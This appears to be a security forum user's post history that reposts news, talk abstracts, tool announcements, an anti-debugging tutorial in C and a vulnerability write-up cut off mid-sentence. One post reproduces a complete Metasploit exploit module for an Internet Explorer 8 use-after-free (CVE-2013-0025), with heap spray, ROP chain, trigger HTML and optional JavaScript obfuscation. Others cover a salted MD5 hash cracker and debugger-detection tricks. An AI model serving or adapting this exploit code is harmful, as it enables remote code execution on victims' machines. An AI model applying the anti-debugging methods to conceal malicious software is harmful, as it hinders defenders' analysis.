Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    Am si eu o nelamurire... Ce dracu facea "virusu" asta? Am inteles ca "nu puteai face nimic" pana nu introduceai nu stiu ce cod care trebuia platit. Bun: disable task manager, fereastra fullscren, block input... Mai exact vreo 3 linii de cod. Sau avea ceva special si nu stiu eu?
  2. Nytro
    [TABLE=align: left] [TR] [TD][TABLE=width: 100%] [TR] [TD=align: justify]MD5 Salted Hash Kracker is the free tool to crack and recover your lost password from the salted MD5 hash. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] These days most websites and applications use salt based MD5 hash generation to prevent it from being cracked easily using precomputed hash tables such as Rainbow Crack. In such cases, 'MD5 Salted Hash Kracker' will help you to recover your lost password from salted MD5 hash. It uses dictionary based cracking method which makes the cracking operation simple and easier. By default small dictionary file is included but you can find good collection of password dictionaries (also called wordlist) here & here Though it supports only Dictinary Crack method, you can easily use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with 'MD5 Salted Hash Kracker'. It also allow you to specify the salt position either in the beginning of password [ md5(salt+password)] or at the end of the password [md5(password+salt)]. In case you want to perform normal MD5 hash cracking without the salt then just leave the Salt field blank. It works on both 32-bit & 64-bit Windows platforms starting from Windows XP to Windows 8. [/TD] [/TR] [/TABLE] [TABLE=align: left] [TR] [TD=class: page_subheader]Screenshots[/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD]Screenshot 1: MD5 Salted Hash Kracker is showing the recovered Password for MD5 hash text.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]Screenshot 2: MD5 Hash Password Recovery report generated by MD5SaltedHashKracker[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] Info: MD5 Salted Hash Kracker : Salted MD5 Hash Password Cracker and Recovery Software Download: http://securityxploded.com/download.php#md5saltedhashkracker [/TD] [/TR] [/TABLE]
  3. Nytro
    [h=1][Kernel-Sources] Xperia Z [/h] Open source download for Xperia™ Z (SO-02E); software version 10.1.D.0.317. http://dl-developer.sonymobile.com/code/copylefts/10.1.D.0.317.tar.bz2 Links: - [Kernel-Sources] Xperia Z (SO-02E) {FW: 10.1.D.0.317} - xda-developers - Xperia Z - 4.1.2 - 10.1.A.1.350 - C6602 / C6603 Firmware - for DEVS - xda-developers - DoCoMo SO-02E Xperia Z - 4.1.2 - 10.1.D.0.317 Firmware - for DEVS - xda-developers - [system dump] Xperia Z C6603 10.1.A.1.350 - xda-developers
  4. Nytro
    [sqlI] Join syntax
  5. Nytro
    Hook Analyser Malware Tool 2.3 Authored by Beenu Arora | Site hookanalyser.blogspot.com Hook Analyser is a hook tool which can be potentially helpful in reversing applications and analysing malware. It can hook to an API in a process and search for a pattern in memory or dump the buffer. Changes: New digger module that allows dumping of exes, dlls, and drivers from an executable to separate files. New packer detection and hexdump modules added. Download: http://packetstormsecurity.com/files/download/120310/HookAnalyser2.3.zip Sursa: Hook Analyser Malware Tool 2.3 ? Packet Storm
  6. Nytro
    [h=1]Largest Percentage of 2012 Cyberattacks Originated in Romania, Study Finds[/h]February 15th, 2013, 00:09 GMT · By Eduard Kovacs Most security solutions providers are rushing to release their 2013 threat reports and Trustwave is among them. The company has released its 2013 Trustwave Global Security Report, which highlights the trends from the analysis of over 450 data breaches. In addition to the data breaches, the study is also based on more than 2,500 penetration tests, 2 million network and vulnerability scans, 9 million web application attacks, 5 million malicious websites, 20 billion emails, and several zero-day exploits. The figures reveal that applications have become the most popular attack vector, with e-commerce sites being the number one targeted assets. Worryingly, in 64% of cases, it took attacked organizations more than 90 days to detect an intrusion. The average time for detection was 210 days, which is 35 days longer than it did in 2011. Weak passwords, clicking on malicious links and other risky employee behavior leave the door open for further attacks, the study has found. Of all the intrusion methods identified in 2012, SQL Injection and remote access were the most prevalent, accounting for 73% of infiltration methods. Cyberattacks were discovered in 29 countries, but curiously, the largest percentage (34.4%) of them originated in Romania. When it comes to malware, 40 variations of malware have been found in the 450 cases investigated by Trustwave. It’s believed that 6 criminal groups are responsible for developing them. And since we’re talking about malware, it appears the US and Russia are the largest contributors to malware attacks. “Cybercriminals will never stop trying to compromise systems to obtain valuable information such as customer and private user data, corporate trade secrets and payment card information,” explained Robert McCullen, CEO, chairman and president of Trustwave. “This year’s Global Security Report pulls back the curtain revealing how breaches happen and how potential victims around the world can protect themselves so that they stay one step ahead and eliminate potential security threats.” The complete report will be made available before the RSA Conference in San Francisco. Users who want to receive a complimentary copy can sign up for one here. Sursa: Largest Percentage of 2012 Cyberattacks Originated in Romania, Study Finds - Softpedia
  7. Nytro
    Internet Explorer SLayoutRun Use After Free Vulnerability Description A Use-after-free memory corruption vulnerability was identified in Microsoft Internet Explorer 8. This allows a malicious user to remotely execute arbitrary code on a vulnerable user’s machine, in the context of the current user. The memory corruption happens when the application of a style sheet performs style computations on the DOM. A CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed. Exploitation Exploitation of this vulnerability requires a user to visit a page containing specially crafted JavaScript. Users can generally be lured to visit web pages via email, instant message or links on the internet. Vulnerabilities like this are often hosted on legitimate websites which have been compromised by other means. Due to the inability to dynamically create an object while still triggering the vulnerability, a clean vtable overwrite was not possible. To exploit this vulnerability a ‘pray-after-free’ approach was taken. This approach works by filling memory with incremental sized blocks in the hope that an allocation of the correct size will be placed into the memory location of the freed object. Below is a Metasploit module which exploits this vulnerability: ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Internet Explorer SLayoutRun Use-After-Free", 'Description' => %q{ This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed. }, 'License' => MSF_LICENSE, 'Author' => [ 'Scott Bell <scott.bell@security-assessment.com>', # Vulnerability discovery & Metasploit module ], 'References' => [ [ 'CVE', '2013-0025' ], [ 'MSB', 'MS13-009' ], [ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ], ], 'Payload' => { 'BadChars' => "\x00", 'Space' => 1024, 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ] ], 'Privileged' => false, 'DisclosureDate' => "Feb 13 2013", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # ROP chain generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop_nops = [0x77c39f92].pack("V") * 11 # RETN rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'}) rop_payload << rop_nops rop_payload << [0x77c364d5].pack("V") # POP EBP # RETN rop_payload << [0x77c15ed5].pack("V") # XCHG EAX, ESP # RETN rop_payload << [0x77c35459].pack("V") # PUSH ESP # RETN rop_payload << [0x77c39f92].pack("V") # RETN rop_payload << [0x0c0c0c8c].pack("V") # Shellcode offset rop_payload << code end return rop_payload end def this_resource r = get_resource return ( r == '/') ? '' : r end def get_exploit(my_target, cli) p = get_payload(my_target, cli) js = heap_spray(my_target, p) html = %Q| <!doctype html> <html> <head> <script> var data var objArray = new Array(1800); #{js} setTimeout(function(){ for (var i=0;i<objArray.length;i++){ objArray[i] = document.createElement('body'); document.body.appendChild(objArray[i]) objArray[i].style.display = "none" } document.body.style.whiteSpace = "pre-line" for(var i=0;i<10;i++){ for (var i=0;i<(objArray.length-650);i++){ objArray[i].className = data += unescape("%u0c0c%u0c0c"); } } setTimeout(function(){document.body.innerHTML = "boo"}, 100) }, 100) </script> </head> <body> <p> </p> </body> </html> | return html end def get_iframe html = %Q| <html> <body> <iframe src="#{this_resource}/#{@iframe_name}" height="1" width="1"></iframe> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end if uri =~ /#{@iframe_name}/ html = get_exploit(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") elsif uri=~ /\/$/ html = get_iframe print_status "Sending IFRAME..." end send_response(cli, html, {'Content-Type'=>'text/html'}) end def exploit @iframe_name = "#{Rex::Text.rand_text_alpha(5)}.html" super end end Metasploit module: www.security-assessment.com/files/documents/advisory/ms13_009_ie_slayoutrun_uaf.rb Paper: http://www.security-assessment.com/files/documents/advisory/ms13_009_ie_slayoutrun_uaf.pdf Sursa: Microsoft Internet Explorer 8 Use-After-Free ? Packet Storm
  8. Nytro
    Recent Advances In Ipv6 Security Description: The IPv6 protocol suite was designed to accommodate the present and future growth of the Internet, and is expected to be the successor of the original IPv4 protocol suite. It has already been deployed in a number of production environments, and many organizations have already scheduled or planned its deployment in the next few years. Additionally, a number of activities such as the World IPv6 Day in 2011 and the upcoming World IPv6 Launch Day (scheduled for June 2012) have led to an improvement in IPv6 awareness and an increase in the number of IPv6 deployments. There are a number of factors that make the IPv6 protocol suite interesting from a security standpoint. Firstly, being a new technology, technical personnel has much less confidence with the IPv6 protocols than with their IPv4 counterpart, and thus it is more likely that the security implications of the protocols be overlooked when the protocols are deployed. Secondly, IPv6 implementations are much less mature than their IPv4 counterparts, and thus it is very likely that a number of vulnerabilities will be discovered in them before their robustness matches that of the existing IPv4 implementations. Thirdly, security products such as firewalls and NIDS's (Network Intrusion Detection Systems) usually have less support for the IPv6 protocols than for their IPv4 counterparts, either in terms of features or in terms of performance. Fourthly, the security implications of IPv6 transition/co-existence technologies on existing IPv4 networks are usually overlooked, potentially enabling attackers to leverage these technologies to circumvent IPv4 security measures in unexpected ways. During the last few years, the UK CPNI (Centre for the Protection of National Infrastructure) carried out the first comprehensive security assessment of the Internet Protocol version 6 (IPv6) and related technologies (such as transition/co-existence mechanisms). The result of the aforementioned project is a series of documents that provide advice both to programmers implementing the IPv6 protocol suite and to network engineers and security administrators deploying or operating the protocols. Part of the results of the aforementioned project have been recently published, leading to a number of improvements in many IPv6 implementations, and in the protocol specifications themselves. Fernando Gont will discuss the results of the aforementioned project, introducing the attendees to the "state of the art" in IPv6 security, and providing advice on how to deploy the IPv6 protocols securely. Gont will also discusss recent advances in IPv6 security areas such as Denial of Service attacks, firewall circumvention, network reconnaissance, and First-Hop security, and will describe other IPv6 security areas in which further work is needed. Finally, he will describe some vulnerabilities found in popular IPv6 implementations, such as NDbased Denial of Service attacks, and vulnerabilities arising from the use of predictable IPv6 Fragment Identification or Flow Label values. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Recent Advances In Ipv6 Security
  9. Nytro
    [h=1]theHarvester 2.2a![/h]by Mayuresh on February 13, 2013 “theHarvester is a tool for gathering emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database. This tools is intended to help Penetration testers in the early stages of the project. This is a complete rewrite of the tool with new features like: Time delays between request All sources search Virtual host verifier Active enumeration (DNS enumeration, Reverse lookups, TLD expansion) Integration with SHODAN computer database, to get the open ports and banners Save to XML and HTML Basic graph with stats New sources” [h=2]Official change log for theHarvester:[/h] Fixed Linkedin parser (thanks Alton Johnson and Francesco Stillavato) New banner with superpowers [h=3]Download theHarvester:[/h] theHarvester 2.2a – theHarvester-2.2a.tar.gz Sursa: theHarvester version 2.2a! — PenTestIT
  10. Nytro
    Anti-Debugging: Detecting System Debugger Dejan Lukan February 14, 2013 Introduction In the previous tutorial, we’ve talked about techniques that harden the reverse engineering of the executable and then we looked at anti-debugging techniques. We’ve mentioned the IsDebuggerPresent function and analyzed it in depth. Now in this tutorial, we’re going to look at other ways we can use anti-debugging techniques to detect whether a debugger is being used to debug the program in question. SystemKernelDebuggerInformation The SystemKernelDebuggerInformation function can be used to determine if a kernel debugger is currently being attached to the system. We can retrieve specified system information with functions like NtQuerySystemInformation or ZwQuerySystemInformation. Let’s take a look at the NtQuerySystemInformation function first; the syntax of which is as follows: NTSTATUS WINAPI NtQuerySystemInformation( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength ); We need to pass four parameters to the function: SystemInformationClass: the type of the system information that we would like to retrieve. Possible values are: SystemBasicInformation, SystemExceptionInformation, etc [1]. SystemInformation: a pointer to a buffer that receives the requested information [1]. SystemInformationLength: the size of the buffer pointed to by the SystemInformation parameter. ReturnLength: an optional pointer to a location where the function writes the actual size of the information requested. The ZwQuerySystemInformation function is basically the same as NtQuerySystemInformation, so we won’t describe it in detail. Let’s just present its syntax, which can be seen below: NTSTATUS WINAPI ZwQuerySystemInformation( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength ); It’s a common belief that we should use Zw functions when doing really low level stuff, so we’ll use that function in our example. At the end of the MSDN function call API reference, there’s an important sentence that says the following: “If you do use ZwQuerySystemInformation, access the function through run-time dynamic linking. This gives your code an opportunity to respond gracefully if the function has been changed or removed from the operating system. Signature changes, however, may not be detectable. This function has no associated import library. You must use the LoadLibrary and GetProcAddress functions to dynamically link to Ntdll.dll.” This means that we can’t just include the Ntdll library into our program and call the function directly. Instead, we must dynamically load the Ntdll.dll library into the process and get the address of the function before calling it. At first, we can write a program like this to confirm that the function we would like to call is indeed accessible in the Ntdll.dll library: #include "stdafx.h" #include <stdio.h> #include <windows.h> #include <Winternl.h> int _tmain(int argc, _TCHAR* argv[]) { typedef long NTSTATUS; #define STATUS_SUCCESS ((NTSTATUS)0L) HANDLE hProcess = GetCurrentProcess(); typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION { BOOLEAN DebuggerEnabled; BOOLEAN DebuggerNotPresent; } SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION; enum SYSTEM_INFORMATION_CLASS { SystemKernelDebuggerInformation = 35 }; typedef NTSTATUS (__stdcall *ZW_QUERY_SYSTEM_INFORMATION)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength); ZW_QUERY_SYSTEM_INFORMATION ZwQuerySystemInformation; SYSTEM_KERNEL_DEBUGGER_INFORMATION Info; /* load the ntdll.dll */ HMODULE hModule = LoadLibrary(_T("ntdll.dll")); ZwQuerySystemInformation = (ZW_QUERY_SYSTEM_INFORMATION)GetProcAddress(hModule, "ZwQuerySystemInformation"); if(ZwQuerySystemInformation == NULL) { printf("Error: could not find the function ZwQuerySystemInformation in library ntdll.dll."); exit(-1); } printf("ZwQuerySystemInformation is located at 0x%08x in ntdll.dll.\n", (unsigned int)ZwQuerySystemInformation); if (STATUS_SUCCESS == ZwQuerySystemInformation(SystemKernelDebuggerInformation, &Info, sizeof(Info), NULL)) { if (Info.DebuggerEnabled && !Info.DebuggerNotPresent) { printf("System debugger is present."); } else { printf("System debugger is not present."); } } /* wait */ getchar(); return 0; } We can see that we’ve called the LoadLibrary function to load the Ntdll.dll library into the current program’s address space. After that, we take the handle of the currently loaded module Ntdll.dll and use it within the GetProcAddress function call to get the address of the ZwQuerySystemInformation function. We then check whether the returned address is NULL, in which case the function is not present in the Ntdll.dll library so we print an error message about the absence of the function and terminate the program. Otherwise, the function is present in the Ntdll.dll library, so we print its address. When we compile the program, the address of the function will be displayed. After that, we call the ZwQuerySystemInformation function to get the SystemKernelDebuggerInformation information that we need. We save the result in Info variable, which we then use to check if Info.DebuggerEnabled is true and if Info.DebuggerNotPresent is false. If both conditions hold, then we print that the system debugger is present, otherwise we print that the system debugger is not present. Because we don’t have a system debugger attached, the message saying system debugger not being present is displayed, as we can see on the picture below: Trap Flag Here we’ll exploit the fact that every debugger uses the TP in EFLAGS register when debugging the process. This can be used by setting the trap flag manually in the current process and checking if the exception is raised or not by the use of try-catch statements. If the except{} block is not called, then a debugger handled the exception and it is currently debugging the process. But if the except{} block was called, then a debugger isn’t present and the process is executing normally without being debugged. This approach detects user-mode as well as kernel-mode debuggers, because they all use the trap flag for debugging a program. The following code is taken from [2] and is the implementation of the above description: #include "stdafx.h" #include <stdio.h> #include <windows.h> int _tmain(int argc, _TCHAR* argv[]) { BOOL bExceptionHit = FALSE; __try { _asm { pushfd or dword ptr [esp], 0x100 popfd // Set the Trap Flag // Load value into EFLAGS register nop } } __except(EXCEPTION_EXECUTE_HANDLER) { bExceptionHit = TRUE; // An exception has been raised – // there is no debugger. } if (bExceptionHit == FALSE) printf("A debugger is present.\n"); else printf("There is no debugger present.\n"); /* wait */ getchar(); return 0; } We can see that first, we initialize the Boolean variable bExceptionHit to false. Then we use the try-except block to execute some code. In the try block is some code that must be executed where if an exception occurs, the except{} block is called which sets the Boolean bExceptionHit variable to true. If we compile and run the program now under the Visual Studio debugger, the program will print a statement about the debugger being present, as we can see on the picture below: This is ok and proves that the above code works as expected, since it was clearly able to identify that a debugger is present. But if we copy the compiled executable to Desktop and run that executable in cmd.exe, we can see that the program will print the statement about the debugger not being present; we can see this on the picture below: This is proof that the above code works the way it should: it prints that the debugger is present when we’re running the program under the debugger and it prints that the debugger is not present when running the program normally. Let’s take a look at the try{} block: in it, we’re first saving the value of the flag register onto the stack. Then we’re xoring the value pushed on the stack with the number 0×100 and restoring the flag register’s value (the xored value). What follows is also one nop instruction that doesn’t do anything. So far it’s not exactly evident how the exception should occur because we’re not doing anything that could result in an invalid exception being executed, but wait a few moments and everything will become clear. If we load the program in Ida debugger, we can quickly locate the main function of the executable, which is presented on the picture below: In the main function, we first initialize the stack, but that’s really not important at the moment. What’s important is the assembly instruction from the C source code; we can see them on the picture above (notice the pushf instruction and the following 3 instructions). Those are exactly the instructions we’ve inputted in the C source code in the __asm block. If we set a breakpoint on the pushf instruction and run the program, the program will stop executing exactly on the pushf instruction because of the breakpoint. If we then step through the program, an exception will occur when trying to execute the “popf” instruction. We can see the exception occurring on the picture below: When we tried to execute the popf instruction, a new window pops up, notifying us that the instruction at address 0x41141E (which is exactly the popf instruction) is trying to set the trace bit in the flags register. Here we have a choice of either setting the trace bit, in which case we’re telling Ida to handle the exception by itself, so the program’s exception handler will not be invoked. If we press Run, we’re telling Ida to ignore setting the trace bit and instead generate an exception, which will successfully invoke the program’s exception handler routine and set the bExceptionHit to true. Actually, we can only choose to press the buttons “Run” or “Single step” but in either case, the program’s exception handling routine will be called, so the program will be able to determine that a debugger is being used to execute the program. But why does the exception occur? When the pushf instruction is executed, it will push the values presented on the picture below to the stack: So the value of 0×00000306 gets pushed to the stack at address 0x0012FE70. Then the xoring of the value 0×306 and 0×100 happens. Don’t worry about the [esp+0F8h+var_F8], which is displayed by Ida; the local variable var_F8 holds the value -0xF8, so the expression is actually [esp+0F8h-0F8h], which points exactly to the top of the stack [esp]. So the following operation happens next: 0×306 == 0011 0000 0110 0×100 == 0001 0000 0000 ———— XOR ————- 0×206 == 0010 0000 0110 The end result of the XOR operation is 0×206, which is the new value of the FLAGS register. This effectively inverts the 9th (if we start counting at 1) bit of EFLAGS register, which corresponds to the trap flag TP. Let’s also present the first 12 bits of the EFLAGS register, which can be seen below. Here we can clearly see that the 8th bit is the TF (if we start counting at 0). The picture is taken from the [3]. Basically, we’re inverting the value of the trap flag register, which causes the exception to be generated. We can then catch the exception, which notifies us that the debugger is not present. But if we can’t catch the exception, a debugger is clearly handling the exception and is not passing it on to the program to handle it. Conclusion We’ve seen two special techniques that can be used to detect whether a debugger is currently being used to run the executable or not. This can be a good way to detect if a user is debugging our application and to terminate the application if that happens, which effectively prevents users from debugging our application. References: [1]: http://msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx accessible at http://msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx. [2]: Eldad Eilam, Reversing, Secrets of Reverse Engineering. [3]: FLAGS register, accessible on FLAGS register - Wikipedia, the free encyclopedia. Sursa: InfoSec Institute Resources – Anti-Debugging: Detecting System Debugger
  11. Nytro
    [h=1]White House Cybersecurity Executive Order[/h]Posted by Richard Li in Information Security on Feb 13, 2013 12:16:40 PM Last night, in the State of the Union, President Obama highlighted the risk that America faces from cyber-attack. He also signed an executive order on cybersecurity, expanding the availability of unclassified threat information to critical infrastructure companies and appointing NIST to lead the development of a cybersecurity framework. These are positive steps to improving the cybersecurity of America’s infrastructure, but there is far more that needs to be done to secure our infrastructure. Our digital infrastructure is pervasive, and an integral part of our daily lives. From basic services such as power and communications to healthcare, commerce, finance, and manufacturing – every major industry and service is dependent in some way on the technology grid. This grid is extremely vulnerable to attack. These attacks may take the form of a deliberate, targeted cyberterror-type attack. Of equal likelihood – and potentially with the same impact – is an untargeted attack, where attackers unleash malware into the wild, without a specific target in mind. The impact to our economy and security of a successful attack, whether targeted or not, can be catastrophic. We need to do much, much more, but fixing this problem is not easy. The cybersecurity legislation that sits in both the House and Senate are a good next step. Providing incentives for critical infrastructure providers to improve their cybersecurity based on risk assessments will be another key step. Investing in training skilled security analysts and engineers who can defend against cyber attacks will be critical. The US is expanding the Cyber Command to have 4,900 troops and civilians, up from 900. There are 58,000 troops in the US Special Operations Command alone. As the battlefield evolves from traditional sea, air, and land battles to urban and cyber warfare, we need to evolve our defenses and capability. What can we do? We need to continue to innovate and research these threats, and how they are evolving. We need to invest in growing our cyber workforce. And, most importantly, we need to recognize that every single system in the US can potentially be exploited, and needs to be protected. Sursa: https://community.rapid7.com/community/infosec/blog/2013/02/13/white-house-cybersecurity-executive-order
  12. Nytro
    Beej's Guide to Network Programming Using Internet Sockets Brian "Beej Jorgensen" Hall beej@beej.us Version 3.0.15 July 3, 2012 Copyright © 2012 Brian "Beej Jorgensen" Hall Contents 1. Intro 1.1. Audience 1.2. Platform and Compiler 1.3. Official Homepage and Books For Sale 1.4. Note for Solaris/SunOS Programmers 1.5. Note for Windows Programmers 1.6. Email Policy 1.7. Mirroring 1.8. Note for Translators 1.9. Copyright and Distribution 2. What is a socket? 2.1. Two Types of Internet Sockets 2.2. Low level Nonsense and Network Theory 3. IP Addresses, structs, and Data Munging 3.1. IP Addresses, versions 4 and 6 3.2. Byte Order 3.3. structs 3.4. IP Addresses, Part Deux 4. Jumping from IPv4 to IPv6 5. System Calls or Bust 5.1. getaddrinfo()—Prepare to launch! 5.2. socket()—Get the File Descriptor! 5.3. bind()—What port am I on? 5.4. connect()—Hey, you! 5.5. listen()—Will somebody please call me? 5.6. accept()—"Thank you for calling port 3490." 5.7. send() and recv()—Talk to me, baby! 5.8. sendto() and recvfrom()—Talk to me, DGRAM-style 5.9. close() and shutdown()—Get outta my face! 5.10. getpeername()—Who are you? 5.11. gethostname()—Who am I? 6. Client-Server Background 6.1. A Simple Stream Server 6.2. A Simple Stream Client 6.3. Datagram Sockets 7. Slightly Advanced Techniques 7.1. Blocking 7.2. select()—Synchronous I/O Multiplexing 7.3. Handling Partial send()s 7.4. Serialization—How to Pack Data 7.5. Son of Data Encapsulation 7.6. Broadcast Packets—Hello, World! 8. Common Questions 9. Man Pages 9.1. accept() 9.2. bind() 9.3. connect() 9.4. close() 9.5. getaddrinfo(), freeaddrinfo(), gai_strerror() 9.6. gethostname() 9.7. gethostbyname(), gethostbyaddr() 9.8. getnameinfo() 9.9. getpeername() 9.10. errno 9.11. fcntl() 9.12. htons(), htonl(), ntohs(), ntohl() 9.13. inet_ntoa(), inet_aton(), inet_addr 9.14. inet_ntop(), inet_pton() 9.15. listen() 9.16. perror(), strerror() 9.17. poll() 9.18. recv(), recvfrom() 9.19. select() 9.20. setsockopt(), getsockopt() 9.21. send(), sendto() 9.22. shutdown() 9.23. socket() 9.24. struct sockaddr and pals 10. More References 10.1. Books 10.2. Web References 10.3. RFCs Index Trebuie sa il stiti... http://beej.us/guide/bgnet/output/html/singlepage/bgnet.html
  13. Nytro
    [h=1]Defrag Tools: #27 - WinDbg - Configure Kernel Debugging[/h] [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 34.1 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 205.0 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 126.6 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 448.8 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 313.6 MB High Quality WMV (PC, Xbox, MCE) In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the cables and configuration steps required to set up kernel mode debugging. We use these BCDEdit commands: bcdedit bcdedit /dbgsettings bcdedit /dbgsettings 1394 channel:42 bcdedit /dbgsettings net hostip:192.168.0.10 port:50000 key:a.b.c.d bcdedit /debug on bcdedit /debug off In the debug session, we use these commands: .crash .dump /f lm !lmi .reload /f !drvobj !drvobj <module> 2 bl bc * be <N> bd <N> bp <function> bm <wildcard> x <wildcard> g Make sure you watch Defrag Tools Episode #1 and Defrag Tools Episode #23 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbol and source code resolution. Resources: NT Debugging Blog - How to Setup a Debug Crash Cart to Prevent Your Server from Flat Lining USBView USB3 Debugging Cable - Note, you must use a USB3 A-A cable designed for debugging, otherwise it will fry your box! Timeline: [00:45] - Kernel Debugging Cables [02:14] - USB 2.0 [04:13] - USB 3.0 - New in Windows 8/Windows RT [05:30] - 1394 (Firewire) [10:39] - Break [11:38] - Driver Objects [16:00] - Network - New in Windows 8/Windows RT [17:30] - Breakpoint commands [26:00] - Network - BCDEdit [33:37] - SecureBoot and BitLocker Sursa: Defrag Tools: #27 - WinDbg - Configure Kernel Debugging | Defrag Tools | Channel 9
  14. Nytro
    [h=3]Surprise for Network Resources from kernel32 (MS12-081, Detailed Analysis of Vulnerability in Microsoft File Handling Component)[/h] Microsoft issued a bulletin related to a vulnerability in Microsoft File Handling Component on December 11, 2012. The vulnerability was rated critical and assigned the category Remote Code Execution. Remote code execution is carried out, when a user opens a shared network resource with specially crafted contents. This report provides exploitation details. The results are based on Windows XP SP3 x86. The vulnerability itself is contained in the functions FindFirstFileExW and FindNextFileExW of the library kernel32.dll, which copy data received from the native function NtQueryDirectoryFile with the help of memmove. The problem is that a number received from NtQueryDirectoryFile is used as the size of a source buffer for the copy function, however, it may happen that the size of a destination buffer can be smaller than the result of NtQueryDirectoryFile. This vulnerability affects all applications, which use the functions of the families FindFirstFile/FindNextFile. The first application that comes to my mind is explorer.exe. An attacker only needs to make a user open a link to the malware resource. And, if everything is going well, they will be able to execute code with the same user rights as the current user. The remote execution script according to Microsoft FAQ is possible only via UNC share or WebDAV. A UNC (Universal Naming Convention) path can indicate a file share network resource running on the basis of the SMB protocol. Linux with the Samba service, which allows creating shared fields basing on the protocol, was chosen for the test. We wanted to carry out an attack in accordance with the following scheme. Linux has a similar restriction (not a path length, but a file name length), which is 255 characters. It is only needed to modify the resources of the Samba server to send a 